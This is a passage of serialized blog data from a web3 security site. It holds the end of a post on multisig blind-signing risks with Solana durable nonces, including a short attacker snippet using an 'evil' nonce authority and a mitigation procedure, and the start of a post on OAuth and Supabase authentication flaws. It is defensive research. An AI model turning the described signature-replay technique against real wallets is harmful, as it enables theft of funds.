DurableNonce::from_blockhash(&last_blockhash);\n",[68148],{"type":28,"tag":98,"props":68149,"children":68150},{"__ignoreMap":7},[68151,68203,68236],{"type":28,"tag":116,"props":68152,"children":68153},{"class":245,"line":246},[68154,68158,68162,68166,68170,68174,68179,68183,68187,68191,68195,68199],{"type":28,"tag":116,"props":68155,"children":68156},{"style":376},[68157],{"type":33,"value":2672},{"type":28,"tag":116,"props":68159,"children":68160},{"style":272},[68161],{"type":33,"value":67711},{"type":28,"tag":116,"props":68163,"children":68164},{"style":370},[68165],{"type":33,"value":2226},{"type":28,"tag":116,"props":68167,"children":68168},{"style":376},[68169],{"type":33,"value":13463},{"type":28,"tag":116,"props":68171,"children":68172},{"style":370},[68173],{"type":33,"value":141},{"type":28,"tag":116,"props":68175,"children":68176},{"style":266},[68177],{"type":33,"value":68178},"blockhash_queue",{"type":28,"tag":116,"props":68180,"children":68181},{"style":370},[68182],{"type":33,"value":141},{"type":28,"tag":116,"props":68184,"children":68185},{"style":282},[68186],{"type":33,"value":60259},{"type":28,"tag":116,"props":68188,"children":68189},{"style":266},[68190],{"type":33,"value":13545},{"type":28,"tag":116,"props":68192,"children":68193},{"style":370},[68194],{"type":33,"value":141},{"type":28,"tag":116,"props":68196,"children":68197},{"style":282},[68198],{"type":33,"value":3336},{"type":28,"tag":116,"props":68200,"children":68201},{"style":266},[68202],{"type":33,"value":1445},{"type":28,"tag":116,"props":68204,"children":68205},{"class":245,"line":256},[68206,68210,68215,68219,68223,68227,68232],{"type":28,"tag":116,"props":68207,"children":68208},{"style":376},[68209],{"type":33,"value":2672},{"type":28,"tag":116,"props":68211,"children":68212},{"style":272},[68213],{"type":33,"value":68214}," last_blockhash",{"type":28,"tag":116,"props":68216,"children":68217},{"style":370},[68218],{"type":33,"value":2226},{"type":28,"tag":116,"props":68220,"children":68221},{"style":272},[68222],{"type":33,"value":67711},{"type":28,"tag":116,"props":68224,"children":68225},{"style":370},[68226],{"type":33,"value":141},{"type":28,"tag":116,"props":68228,"children":68229},{"style":282},[68230],{"type":33,"value":68231},"last_hash",{"type":28,"tag":116,"props":68233,"children":68234},{"style":266},[68235],{"type":33,"value":1445},{"type":28,"tag":116,"props":68237,"children":68238},{"class":245,"line":293},[68239,68243,68248,68252,68257,68261,68266,68270,68274,68279],{"type":28,"tag":116,"props":68240,"children":68241},{"style":376},[68242],{"type":33,"value":2672},{"type":28,"tag":116,"props":68244,"children":68245},{"style":272},[68246],{"type":33,"value":68247}," next_durable_nonce",{"type":28,"tag":116,"props":68249,"children":68250},{"style":370},[68251],{"type":33,"value":2226},{"type":28,"tag":116,"props":68253,"children":68254},{"style":339},[68255],{"type":33,"value":68256}," DurableNonce",{"type":28,"tag":116,"props":68258,"children":68259},{"style":370},[68260],{"type":33,"value":3151},{"type":28,"tag":116,"props":68262,"children":68263},{"style":282},[68264],{"type":33,"value":68265},"from_blockhash",{"type":28,"tag":116,"props":68267,"children":68268},{"style":266},[68269],{"type":33,"value":313},{"type":28,"tag":116,"props":68271,"children":68272},{"style":370},[68273],{"type":33,"value":2780},{"type":28,"tag":116,"props":68275,"children":68276},{"style":272},[68277],{"type":33,"value":68278},"last_blockhash",{"type":28,"tag":116,"props":68280,"children":68281},{"style":266},[68282],{"type":33,"value":895},{"type":28,"tag":29,"props":68284,"children":68285},{},[68286,68288,68293],{"type":33,"value":68287},"This has an important consequence for our threat model. Unlike recent blockhash transactions, durable nonce transactions ",{"type":28,"tag":2583,"props":68289,"children":68290},{},[68291],{"type":33,"value":68292},"can",{"type":33,"value":68294}," be saved and reused.",{"type":28,"tag":63,"props":68296,"children":68298},{"id":68297},"threat-model",[68299],{"type":33,"value":68300},"Threat Model",{"type":28,"tag":29,"props":68302,"children":68303},{},[68304],{"type":33,"value":68305},"Let's consider a simplified form of the original question.",{"type":28,"tag":455,"props":68307,"children":68308},{},[68309,68314,68319],{"type":28,"tag":459,"props":68310,"children":68311},{},[68312],{"type":33,"value":68313},"We have a N/M multisig",{"type":28,"tag":459,"props":68315,"children":68316},{},[68317],{"type":33,"value":68318},"Signers are unable to see what they're signing, both with respect to content and quantity of signatures. This is roughly equivalent to blind signing transactions.",{"type":28,"tag":459,"props":68320,"children":68321},{},[68322],{"type":33,"value":68323},"We can accurately query chain state.",{"type":28,"tag":29,"props":68325,"children":68326},{},[68327],{"type":33,"value":68328},"Can we safely sign transactions?",{"type":28,"tag":29,"props":68330,"children":68331},{},[68332],{"type":33,"value":68333},"One observation is that this problem is very hard to solve with durable nonces. By signing durable nonce transactions, an attacker could collect signatures and replay them at some indeterminite future point.",{"type":28,"tag":29,"props":68335,"children":68336},{},[68337,68339,68345,68347,68354],{"type":33,"value":68338},"Durable nonces require an onchain account, and it's possible to use a ",{"type":28,"tag":98,"props":68340,"children":68342},{"className":68341},[],[68343],{"type":33,"value":68344},"getProgramAccounts",{"type":33,"value":68346}," call to validate if your signer ",{"type":28,"tag":87,"props":68348,"children":68351},{"href":68349,"rel":68350},"https://solana.stackexchange.com/questions/9650/is-there-any-way-to-get-nonce-accounts-of-an-authorized-account",[91],[68352],{"type":33,"value":68353},"has an associated durable nonce",{"type":33,"value":141},{"type":28,"tag":234,"props":68356,"children":68358},{"className":35556,"code":68357,"language":35558,"meta":7,"style":7},"const connection = new Connection(clusterApiUrl('testnet'));\nconst nonceAccounts = await connection.getProgramAccounts(\n  // The system program owns all nonce accounts.\n  SYSTEM_PROGRAM_ADDRESS,\n  {\n    filters: [\n      {\n        // Nonce accounts are exactly 80 bytes long\n        dataSize: 80,\n      },\n      {\n        // The authority's 32-byte public key is written\n        // into bytes 8-40 of the nonce's account data.\n        memcmp: {\n          bytes: AUTHORITY_PUBLIC_KEY.toBase58(),\n          offset: 8,\n        },\n      },\n    ],\n  }\n);\n",[68359],{"type":28,"tag":98,"props":68360,"children":68361},{"__ignoreMap":7},[68362,68409,68445,68453,68465,68473,68485,68493,68501,68518,68525,68532,68540,68548,68560,68586,68603,68610,68617,68625,68632],{"type":28,"tag":116,"props":68363,"children":68364},{"class":245,"line":246},[68365,68369,68374,68378,68382,68387,68391,68396,68400,68405],{"type":28,"tag":116,"props":68366,"children":68367},{"style":376},[68368],{"type":33,"value":9323},{"type":28,"tag":116,"props":68370,"children":68371},{"style":272},[68372],{"type":33,"value":68373}," connection",{"type":28,"tag":116,"props":68375,"children":68376},{"style":370},[68377],{"type":33,"value":2226},{"type":28,"tag":116,"props":68379,"children":68380},{"style":376},[68381],{"type":33,"value":31582},{"type":28,"tag":116,"props":68383,"children":68384},{"style":282},[68385],{"type":33,"value":68386}," Connection",{"type":28,"tag":116,"props":68388,"children":68389},{"style":266},[68390],{"type":33,"value":313},{"type":28,"tag":116,"props":68392,"children":68393},{"style":282},[68394],{"type":33,"value":68395},"clusterApiUrl",{"type":28,"tag":116,"props":68397,"children":68398},{"style":266},[68399],{"type":33,"value":313},{"type":28,"tag":116,"props":68401,"children":68402},{"style":563},[68403],{"type":33,"value":68404},"'testnet'",{"type":28,"tag":116,"props":68406,"children":68407},{"style":266},[68408],{"type":33,"value":1929},{"type":28,"tag":116,"props":68410,"children":68411},{"class":245,"line":256},[68412,68416,68421,68425,68429,68433,68437,68441],{"type":28,"tag":116,"props":68413,"children":68414},{"style":376},[68415],{"type":33,"value":9323},{"type":28,"tag":116,"props":68417,"children":68418},{"style":272},[68419],{"type":33,"value":68420}," nonceAccounts",{"type":28,"tag":116,"props":68422,"children":68423},{"style":370},[68424],{"type":33,"value":2226},{"type":28,"tag":116,"props":68426,"children":68427},{"style":260},[68428],{"type":33,"value":35837},{"type":28,"tag":116,"props":68430,"children":68431},{"style":272},[68432],{"type":33,"value":68373},{"type":28,"tag":116,"props":68434,"children":68435},{"style":266},[68436],{"type":33,"value":141},{"type":28,"tag":116,"props":68438,"children":68439},{"style":282},[68440],{"type":33,"value":68344},{"type":28,"tag":116,"props":68442,"children":68443},{"style":266},[68444],{"type":33,"value":3133},{"type":28,"tag":116,"props":68446,"children":68447},{"class":245,"line":293},[68448],{"type":28,"tag":116,"props":68449,"children":68450},{"style":250},[68451],{"type":33,"value":68452},"  // The system program owns all nonce accounts.\n",{"type":28,"tag":116,"props":68454,"children":68455},{"class":245,"line":361},[68456,68461],{"type":28,"tag":116,"props":68457,"children":68458},{"style":272},[68459],{"type":33,"value":68460},"  SYSTEM_PROGRAM_ADDRESS",{"type":28,"tag":116,"props":68462,"children":68463},{"style":266},[68464],{"type":33,"value":3178},{"type":28,"tag":116,"props":68466,"children":68467},{"class":245,"line":387},[68468],{"type":28,"tag":116,"props":68469,"children":68470},{"style":266},[68471],{"type":33,"value":68472},"  {\n",{"type":28,"tag":116,"props":68474,"children":68475},{"class":245,"line":400},[68476,68481],{"type":28,"tag":116,"props":68477,"children":68478},{"style":272},[68479],{"type":33,"value":68480},"    filters:",{"type":28,"tag":116,"props":68482,"children":68483},{"style":266},[68484],{"type":33,"value":25276},{"type":28,"tag":116,"props":68486,"children":68487},{"class":245,"line":614},[68488],{"type":28,"tag":116,"props":68489,"children":68490},{"style":266},[68491],{"type":33,"value":68492},"      {\n",{"type":28,"tag":116,"props":68494,"children":68495},{"class":245,"line":631},[68496],{"type":28,"tag":116,"props":68497,"children":68498},{"style":250},[68499],{"type":33,"value":68500},"        // Nonce accounts are exactly 80 bytes long\n",{"type":28,"tag":116,"props":68502,"children":68503},{"class":245,"line":665},[68504,68509,68514],{"type":28,"tag":116,"props":68505,"children":68506},{"style":272},[68507],{"type":33,"value":68508},"        dataSize:",{"type":28,"tag":116,"props":68510,"children":68511},{"style":350},[68512],{"type":33,"value":68513}," 80",{"type":28,"tag":116,"props":68515,"children":68516},{"style":266},[68517],{"type":33,"value":3178},{"type":28,"tag":116,"props":68519,"children":68520},{"class":245,"line":713},[68521],{"type":28,"tag":116,"props":68522,"children":68523},{"style":266},[68524],{"type":33,"value":36823},{"type":28,"tag":116,"props":68526,"children":68527},{"class":245,"line":750},[68528],{"type":28,"tag":116,"props":68529,"children":68530},{"style":266},[68531],{"type":33,"value":68492},{"type":28,"tag":116,"props":68533,"children":68534},{"class":245,"line":779},[68535],{"type":28,"tag":116,"props":68536,"children":68537},{"style":250},[68538],{"type":33,"value":68539},"        // The authority's 32-byte public key is written\n",{"type":28,"tag":116,"props":68541,"children":68542},{"class":245,"line":796},[68543],{"type":28,"tag":116,"props":68544,"children":68545},{"style":250},[68546],{"type":33,"value":68547},"        // into bytes 8-40 of the nonce's account data.\n",{"type":28,"tag":116,"props":68549,"children":68550},{"class":245,"line":847},[68551,68556],{"type":28,"tag":116,"props":68552,"children":68553},{"style":272},[68554],{"type":33,"value":68555},"        memcmp:",{"type":28,"tag":116,"props":68557,"children":68558},{"style":266},[68559],{"type":33,"value":1291},{"type":28,"tag":116,"props":68561,"children":68562},{"class":245,"line":898},[68563,68568,68573,68577,68582],{"type":28,"tag":116,"props":68564,"children":68565},{"style":272},[68566],{"type":33,"value":68567},"          bytes:",{"type":28,"tag":116,"props":68569,"children":68570},{"style":272},[68571],{"type":33,"value":68572}," AUTHORITY_PUBLIC_KEY",{"type":28,"tag":116,"props":68574,"children":68575},{"style":266},[68576],{"type":33,"value":141},{"type":28,"tag":116,"props":68578,"children":68579},{"style":282},[68580],{"type":33,"value":68581},"toBase58",{"type":28,"tag":116,"props":68583,"children":68584},{"style":266},[68585],{"type":33,"value":3161},{"type":28,"tag":116,"props":68587,"children":68588},{"class":245,"line":907},[68589,68594,68599],{"type":28,"tag":116,"props":68590,"children":68591},{"style":272},[68592],{"type":33,"value":68593},"          offset:",{"type":28,"tag":116,"props":68595,"children":68596},{"style":350},[68597],{"type":33,"value":68598}," 8",{"type":28,"tag":116,"props":68600,"children":68601},{"style":266},[68602],{"type":33,"value":3178},{"type":28,"tag":116,"props":68604,"children":68605},{"class":245,"line":981},[68606],{"type":28,"tag":116,"props":68607,"children":68608},{"style":266},[68609],{"type":33,"value":25028},{"type":28,"tag":116,"props":68611,"children":68612},{"class":245,"line":1011},[68613],{"type":28,"tag":116,"props":68614,"children":68615},{"style":266},[68616],{"type":33,"value":36823},{"type":28,"tag":116,"props":68618,"children":68619},{"class":245,"line":1029},[68620],{"type":28,"tag":116,"props":68621,"children":68622},{"style":266},[68623],{"type":33,"value":68624},"    ],\n",{"type":28,"tag":116,"props":68626,"children":68627},{"class":245,"line":1038},[68628],{"type":28,"tag":116,"props":68629,"children":68630},{"style":266},[68631],{"type":33,"value":5543},{"type":28,"tag":116,"props":68633,"children":68634},{"class":245,"line":1047},[68635],{"type":28,"tag":116,"props":68636,"children":68637},{"style":266},[68638],{"type":33,"value":895},{"type":28,"tag":29,"props":68640,"children":68641},{},[68642,68644,68652],{"type":33,"value":68643},"Unfortunately this is not sufficient",{"type":28,"tag":15136,"props":68645,"children":68646},{},[68647],{"type":28,"tag":87,"props":68648,"children":68650},{"href":29279,"ariaDescribedBy":68649,"dataFootnoteRef":7,"id":29281},[15143],[68651],{"type":33,"value":1824},{"type":33,"value":68653},". A transaction may have multiple signers, and an attacker could use their own durable nonce fee-payer. This means our problem as defined above is unfortunately unsolvable.",{"type":28,"tag":234,"props":68655,"children":68657},{"className":2652,"code":68656,"language":2651,"meta":7,"style":7},"    let instruction = system_instruction::transfer(&from, &ledger_base_pubkey, 42);\n    let message =\n        Message::new_with_nonce(vec![instruction], Some(&evil_nonce_authority), &nonce_account, &evil_nonce_authority)\n            .serialize();\n",[68658],{"type":28,"tag":98,"props":68659,"children":68660},{"__ignoreMap":7},[68661,68727,68743,68826],{"type":28,"tag":116,"props":68662,"children":68663},{"class":245,"line":246},[68664,68668,68672,68676,68681,68685,68689,68693,68697,68701,68705,68709,68714,68718,68723],{"type":28,"tag":116,"props":68665,"children":68666},{"style":376},[68667],{"type":33,"value":2672},{"type":28,"tag":116,"props":68669,"children":68670},{"style":272},[68671],{"type":33,"value":42992},{"type":28,"tag":116,"props":68673,"children":68674},{"style":370},[68675],{"type":33,"value":2226},{"type":28,"tag":116,"props":68677,"children":68678},{"style":266},[68679],{"type":33,"value":68680}," system_instruction",{"type":28,"tag":116,"props":68682,"children":68683},{"style":370},[68684],{"type":33,"value":3151},{"type":28,"tag":116,"props":68686,"children":68687},{"style":282},[68688],{"type":33,"value":31772},{"type":28,"tag":116,"props":68690,"children":68691},{"style":266},[68692],{"type":33,"value":313},{"type":28,"tag":116,"props":68694,"children":68695},{"style":370},[68696],{"type":33,"value":2780},{"type":28,"tag":116,"props":68698,"children":68699},{"style":272},[68700],{"type":33,"value":19137},{"type":28,"tag":116,"props":68702,"children":68703},{"style":266},[68704],{"type":33,"value":825},{"type":28,"tag":116,"props":68706,"children":68707},{"style":370},[68708],{"type":33,"value":2780},{"type":28,"tag":116,"props":68710,"children":68711},{"style":272},[68712],{"type":33,"value":68713},"ledger_base_pubkey",{"type":28,"tag":116,"props":68715,"children":68716},{"style":266},[68717],{"type":33,"value":825},{"type":28,"tag":116,"props":68719,"children":68720},{"style":350},[68721],{"type":33,"value":68722},"42",{"type":28,"tag":116,"props":68724,"children":68725},{"style":266},[68726],{"type":33,"value":895},{"type":28,"tag":116,"props":68728,"children":68729},{"class":245,"line":256},[68730,68734,68739],{"type":28,"tag":116,"props":68731,"children":68732},{"style":376},[68733],{"type":33,"value":2672},{"type":28,"tag":116,"props":68735,"children":68736},{"style":272},[68737],{"type":33,"value":68738}," message",{"type":28,"tag":116,"props":68740,"children":68741},{"style":370},[68742],{"type":33,"value":35481},{"type":28,"tag":116,"props":68744,"children":68745},{"class":245,"line":293},[68746,68751,68755,68760,68764,68768,68772,68776,68780,68784,68788,68792,68797,68801,68805,68810,68814,68818,68822],{"type":28,"tag":116,"props":68747,"children":68748},{"style":339},[68749],{"type":33,"value":68750},"        Message",{"type":28,"tag":116,"props":68752,"children":68753},{"style":370},[68754],{"type":33,"value":3151},{"type":28,"tag":116,"props":68756,"children":68757},{"style":282},[68758],{"type":33,"value":68759},"new_with_nonce",{"type":28,"tag":116,"props":68761,"children":68762},{"style":266},[68763],{"type":33,"value":313},{"type":28,"tag":116,"props":68765,"children":68766},{"style":282},[68767],{"type":33,"value":3545},{"type":28,"tag":116,"props":68769,"children":68770},{"style":266},[68771],{"type":33,"value":347},{"type":28,"tag":116,"props":68773,"children":68774},{"style":272},[68775],{"type":33,"value":43302},{"type":28,"tag":116,"props":68777,"children":68778},{"style":266},[68779],{"type":33,"value":22723},{"type":28,"tag":116,"props":68781,"children":68782},{"style":339},[68783],{"type":33,"value":41641},{"type":28,"tag":116,"props":68785,"children":68786},{"style":266},[68787],{"type":33,"value":313},{"type":28,"tag":116,"props":68789,"children":68790},{"style":370},[68791],{"type":33,"value":2780},{"type":28,"tag":116,"props":68793,"children":68794},{"style":272},[68795],{"type":33,"value":68796},"evil_nonce_authority",{"type":28,"tag":116,"props":68798,"children":68799},{"style":266},[68800],{"type":33,"value":14840},{"type":28,"tag":116,"props":68802,"children":68803},{"style":370},[68804],{"type":33,"value":2780},{"type":28,"tag":116,"props":68806,"children":68807},{"style":272},[68808],{"type":33,"value":68809},"nonce_account",{"type":28,"tag":116,"props":68811,"children":68812},{"style":266},[68813],{"type":33,"value":825},{"type":28,"tag":116,"props":68815,"children":68816},{"style":370},[68817],{"type":33,"value":2780},{"type":28,"tag":116,"props":68819,"children":68820},{"style":272},[68821],{"type":33,"value":68796},{"type":28,"tag":116,"props":68823,"children":68824},{"style":266},[68825],{"type":33,"value":2830},{"type":28,"tag":116,"props":68827,"children":68828},{"class":245,"line":361},[68829,68833,68838],{"type":28,"tag":116,"props":68830,"children":68831},{"style":370},[68832],{"type":33,"value":2838},{"type":28,"tag":116,"props":68834,"children":68835},{"style":282},[68836],{"type":33,"value":68837},"serialize",{"type":28,"tag":116,"props":68839,"children":68840},{"style":266},[68841],{"type":33,"value":1445},{"type":28,"tag":29,"props":68843,"children":68844},{},[68845,68847,68854],{"type":33,"value":68846},"Luckily, it is tractable with a small modification. What if the signer is allowed to observe the fee-payer on the transaction? For example, Ledger ",{"type":28,"tag":87,"props":68848,"children":68851},{"href":68849,"rel":68850},"https://github.com/LedgerHQ/app-solana/blob/a19da6c301541390bd08731a10f1f128b38ee66e/src/handle_sign_message.c#L97",[91],[68852],{"type":33,"value":68853},"logs the fee-payer here",{"type":33,"value":141},{"type":28,"tag":234,"props":68856,"children":68858},{"className":16176,"code":68857,"language":1797,"meta":7,"style":7},"bool print_config_show_authority(const PrintConfig* print_config, const Pubkey* authority) {\n    return print_config->expert_mode || !pubkeys_equal(print_config->signer_pubkey, authority);\n}\n",[68859],{"type":28,"tag":98,"props":68860,"children":68861},{"__ignoreMap":7},[68862,68921,68977],{"type":28,"tag":116,"props":68863,"children":68864},{"class":245,"line":246},[68865,68869,68874,68878,68882,68887,68891,68896,68900,68904,68908,68912,68917],{"type":28,"tag":116,"props":68866,"children":68867},{"style":376},[68868],{"type":33,"value":29341},{"type":28,"tag":116,"props":68870,"children":68871},{"style":282},[68872],{"type":33,"value":68873}," print_config_show_authority",{"type":28,"tag":116,"props":68875,"children":68876},{"style":266},[68877],{"type":33,"value":313},{"type":28,"tag":116,"props":68879,"children":68880},{"style":376},[68881],{"type":33,"value":9323},{"type":28,"tag":116,"props":68883,"children":68884},{"style":266},[68885],{"type":33,"value":68886}," PrintConfig",{"type":28,"tag":116,"props":68888,"children":68889},{"style":370},[68890],{"type":33,"value":4240},{"type":28,"tag":116,"props":68892,"children":68893},{"style":272},[68894],{"type":33,"value":68895}," print_config",{"type":28,"tag":116,"props":68897,"children":68898},{"style":266},[68899],{"type":33,"value":825},{"type":28,"tag":116,"props":68901,"children":68902},{"style":376},[68903],{"type":33,"value":9323},{"type":28,"tag":116,"props":68905,"children":68906},{"style":266},[68907],{"type":33,"value":20520},{"type":28,"tag":116,"props":68909,"children":68910},{"style":370},[68911],{"type":33,"value":4240},{"type":28,"tag":116,"props":68913,"children":68914},{"style":272},[68915],{"type":33,"value":68916}," authority",{"type":28,"tag":116,"props":68918,"children":68919},{"style":266},[68920],{"type":33,"value":844},{"type":28,"tag":116,"props":68922,"children":68923},{"class":245,"line":256},[68924,68928,68932,68936,68941,68945,68949,68954,68958,68963,68967,68972],{"type":28,"tag":116,"props":68925,"children":68926},{"style":260},[68927],{"type":33,"value":393},{"type":28,"tag":116,"props":68929,"children":68930},{"style":272},[68931],{"type":33,"value":68895},{"type":28,"tag":116,"props":68933,"children":68934},{"style":266},[68935],{"type":33,"value":13423},{"type":28,"tag":116,"props":68937,"children":68938},{"style":272},[68939],{"type":33,"value":68940},"expert_mode",{"type":28,"tag":116,"props":68942,"children":68943},{"style":370},[68944],{"type":33,"value":23361},{"type":28,"tag":116,"props":68946,"children":68947},{"style":370},[68948],{"type":33,"value":12530},{"type":28,"tag":116,"props":68950,"children":68951},{"style":282},[68952],{"type":33,"value":68953},"pubkeys_equal",{"type":28,"tag":116,"props":68955,"children":68956},{"style":266},[68957],{"type":33,"value":313},{"type":28,"tag":116,"props":68959,"children":68960},{"style":272},[68961],{"type":33,"value":68962},"print_config",{"type":28,"tag":116,"props":68964,"children":68965},{"style":266},[68966],{"type":33,"value":13423},{"type":28,"tag":116,"props":68968,"children":68969},{"style":272},[68970],{"type":33,"value":68971},"signer_pubkey",{"type":28,"tag":116,"props":68973,"children":68974},{"style":266},[68975],{"type":33,"value":68976},", authority);\n",{"type":28,"tag":116,"props":68978,"children":68979},{"class":245,"line":293},[68980],{"type":28,"tag":116,"props":68981,"children":68982},{"style":266},[68983],{"type":33,"value":406},{"type":28,"tag":29,"props":68985,"children":68986},{},[68987],{"type":33,"value":68988},"Let's say we've determined our signer has no associated nonce accounts. If our pubkey is the fee-payer on the new proposed transaction, we can know for sure that the transaction does not use durable nonces!",{"type":28,"tag":29,"props":68990,"children":68991},{},[68992],{"type":33,"value":68993},"Without durable nonces, the problem becomes much easier to solve. After waiting enough time, there'll be a point where all previously signed transactions will be expired. If we see no unexpected transactions, that means we're safe.",{"type":28,"tag":29,"props":68995,"children":68996},{},[68997],{"type":33,"value":68998},"We can then use the following procedure.",{"type":28,"tag":455,"props":69000,"children":69001},{},[69002,69007,69012,69017,69022],{"type":28,"tag":459,"props":69003,"children":69004},{},[69005],{"type":33,"value":69006},"Ensure all signers have no durable nonce accounts.",{"type":28,"tag":459,"props":69008,"children":69009},{},[69010],{"type":33,"value":69011},"The first signer signs and submits the transaction.",{"type":28,"tag":459,"props":69013,"children":69014},{},[69015],{"type":33,"value":69016},"Wait two minutes for all recent blockhashes to expire.",{"type":28,"tag":459,"props":69018,"children":69019},{},[69020],{"type":33,"value":69021},"Observe recent transactions associated with the signer to ensure nothing unexpected is submitted.",{"type":28,"tag":459,"props":69023,"children":69024},{},[69025],{"type":33,"value":69026},"Repeat steps 2 to 4 for each signer",{"type":28,"tag":63,"props":69028,"children":69030},{"id":69029},"beyond",[69031],{"type":33,"value":69032},"Beyond",{"type":28,"tag":29,"props":69034,"children":69035},{},[69036],{"type":33,"value":69037},"Solana's signature model is unique. What can protocols do if they're deploying on blockchains without these unique properties? The most important constraint is observability. There must be a way you can see what you're signing, either while signing or implicitly after the fact.",{"type":28,"tag":29,"props":69039,"children":69040},{},[69041,69043,69050],{"type":33,"value":69042},"For example, pcaversaccio wrote a tool to ",{"type":28,"tag":87,"props":69044,"children":69047},{"href":69045,"rel":69046},"https://github.com/pcaversaccio/safe-tx-hashes-util",[91],[69048],{"type":33,"value":69049},"validate Safe transaction hashes",{"type":33,"value":69051},". As the space matures, we hope more open source tooling will come to light.",{"type":28,"tag":18085,"props":69053,"children":69055},{"className":69054,"dataFootnotes":7},[18088],[69056,69061],{"type":28,"tag":63,"props":69057,"children":69059},{"className":69058,"id":15143},[18093],[69060],{"type":33,"value":18096},{"type":28,"tag":455,"props":69062,"children":69063},{},[69064],{"type":28,"tag":459,"props":69065,"children":69066},{"id":30021},[69067,69069,69077,69079],{"type":33,"value":69068},"The original version of this blog post did not consider a malicious fee-payer. Thanks to ",{"type":28,"tag":87,"props":69070,"children":69074},{"href":69071,"rel":69072,":style":69073},"https://twitter.com/PierreArowana",[91],"color: #B1D0EE; text-decoration: underline;",[69075],{"type":33,"value":69076},"@PierreArowana",{"type":33,"value":69078}," for pointing this out to me. ",{"type":28,"tag":87,"props":69080,"children":69082},{"href":30049,"ariaLabel":18199,"className":69081,"dataFootnoteBackref":7},[18201],[69083],{"type":33,"value":18204},{"type":28,"tag":2516,"props":69085,"children":69086},{},[69087],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":69089},[69090,69094,69095,69096],{"id":67286,"depth":256,"text":67289,"children":69091},[69092,69093],{"id":67297,"depth":293,"text":67300},{"id":67576,"depth":293,"text":67579},{"id":68297,"depth":256,"text":68300},{"id":69029,"depth":256,"text":69032},{"id":15143,"depth":256,"text":18096},"content:blog:2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security.md","blog/2025-02-22-multisig-security",{"_path":69101,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":69102,"description":69103,"date":69104,"author":69105,"image":69106,"isFeatured":19,"onBlogPage":19,"tags":69108,"body":69109,"_type":2534,"_id":70804,"_source":2536,"_file":70805,"_stem":70806,"_extension":2539},"/blog/2025-03-07-subverting-web2-authentication-in-web3","Subverting Web2 Authentication in Web3","Web3 authentication uses cryptographic signatures and wallets, but Web2 auth integrations can introduce hidden risks. We explore vulnerabilities like OAuth logic exploits, Supabase misconfigurations, and OAuth abuse in localhost setups.","2025-03-07",[12,13],{"src":69107},"/posts/web2-in-web3/title.jpg",[21],{"type":25,"children":69110,"toc":70786},[69111,69116,69121,69126,69152,69158,69163,69169,69190,69196,69201,69208,69221,69251,69257,69301,69308,69314,69347,69368,69376,69395,69402,69407,69413,69418,69423,69448,69453,69459,69465,69486,69492,69519,69547,69554,69559,69564,69908,69912,69934,69940,69961,69975,69988,69993,70008,70013,70741,70746,70751,70756,70768,70772,70777,70782],{"type":28,"tag":29,"props":69112,"children":69113},{},[69114],{"type":33,"value":69115},"Authentication serves as a cornerstone of secure interactions in Web3, enabling access control, user identity verification, and transaction integrity. Unlike traditional Web2 systems, which often rely on centralized databases and password-based mechanisms, Web3 systems adopt decentralized identifiers (DIDs), cryptographic signatures, and wallet-based authentication. However, there are many applications that still use Web2-based authentication providers to improve the user experience.",{"type":28,"tag":29,"props":69117,"children":69118},{},[69119],{"type":33,"value":69120},"In our research, we focused on Web3 applications that rely on Web2-based authentication methods. Specifically, we analyzed the authentication flows of these applications and identified a lesser-known class of vulnerabilities.",{"type":28,"tag":29,"props":69122,"children":69123},{},[69124],{"type":33,"value":69125},"In this article, we will discuss three cases we discovered:",{"type":28,"tag":455,"props":69127,"children":69128},{},[69129,69134,69147],{"type":28,"tag":459,"props":69130,"children":69131},{},[69132],{"type":33,"value":69133},"OAuth Logic Vulnerability on an Authentication Provider",{"type":28,"tag":459,"props":69135,"children":69136},{},[69137,69139,69145],{"type":33,"value":69138},"Supabase ",{"type":28,"tag":98,"props":69140,"children":69142},{"className":69141},[],[69143],{"type":33,"value":69144},"user_metadata",{"type":33,"value":69146}," misconfiguration",{"type":28,"tag":459,"props":69148,"children":69149},{},[69150],{"type":33,"value":69151},"OAuth abuse in localhost development environment",{"type":28,"tag":63,"props":69153,"children":69155},{"id":69154},"abusing-oauth-authentication-logic",[69156],{"type":33,"value":69157},"Abusing OAuth Authentication Logic",{"type":28,"tag":29,"props":69159,"children":69160},{},[69161],{"type":33,"value":69162},"During our research, we initially identified some bugs in applications. However, these were mostly simple and well-known issues, so we decided to focus on vulnerabilities within authentication providers themselves.",{"type":28,"tag":75,"props":69164,"children":69166},{"id":69165},"web3auth-introduction",[69167],{"type":33,"value":69168},"Web3Auth Introduction",{"type":28,"tag":29,"props":69170,"children":69171},{},[69172,69179,69181,69188],{"type":28,"tag":87,"props":69173,"children":69176},{"href":69174,"rel":69175},"https://web3auth.io/",[91],[69177],{"type":33,"value":69178},"Web3Auth",{"type":33,"value":69180}," is a tool designed to simplify the login process for Web3 applications, eliminating the need for users to manage complex wallet setups or memorize lengthy passwords. One of its products, Web3Auth PnP (Plug and Play), supports ",{"type":28,"tag":87,"props":69182,"children":69185},{"href":69183,"rel":69184},"https://oauth.net/2/",[91],[69186],{"type":33,"value":69187},"OAuth2",{"type":33,"value":69189}," authentication using Google. The product employs a sophisticated authentication flow and infrastructure to maintain seamless integration with dApps.",{"type":28,"tag":75,"props":69191,"children":69193},{"id":69192},"web3auth-authentication-flow",[69194],{"type":33,"value":69195},"Web3Auth Authentication flow",{"type":28,"tag":29,"props":69197,"children":69198},{},[69199],{"type":33,"value":69200},"The Web3Auth PnP authentication flow involves a web session server that stores authentication parameters and configurations. Below is a diagram illustrating how the authentication process works:",{"type":28,"tag":29,"props":69202,"children":69203},{},[69204],{"type":28,"tag":206,"props":69205,"children":69207},{"alt":50198,"src":69206},"/posts/web2-in-web3/auth-flow.png",[],{"type":28,"tag":29,"props":69209,"children":69210},{},[69211,69213,69219],{"type":33,"value":69212},"After the final redirect back to the dApp,  the application can use the secret token to authenticate with the service identified by the ",{"type":28,"tag":98,"props":69214,"children":69216},{"className":69215},[],[69217],{"type":33,"value":69218},"client_id",{"type":33,"value":69220},". This design ensures that you cannot use the token to authenticate against any unauthorized application.",{"type":28,"tag":29,"props":69222,"children":69223},{},[69224,69226,69232,69234,69240,69242,69249],{"type":33,"value":69225},"Additionally, it is important to note that each dApp has a whitelist of redirect URLs. The ",{"type":28,"tag":98,"props":69227,"children":69229},{"className":69228},[],[69230],{"type":33,"value":69231},"/start",{"type":33,"value":69233}," validates the ",{"type":28,"tag":98,"props":69235,"children":69237},{"className":69236},[],[69238],{"type":33,"value":69239},"redirect_url",{"type":33,"value":69241}," against the configured 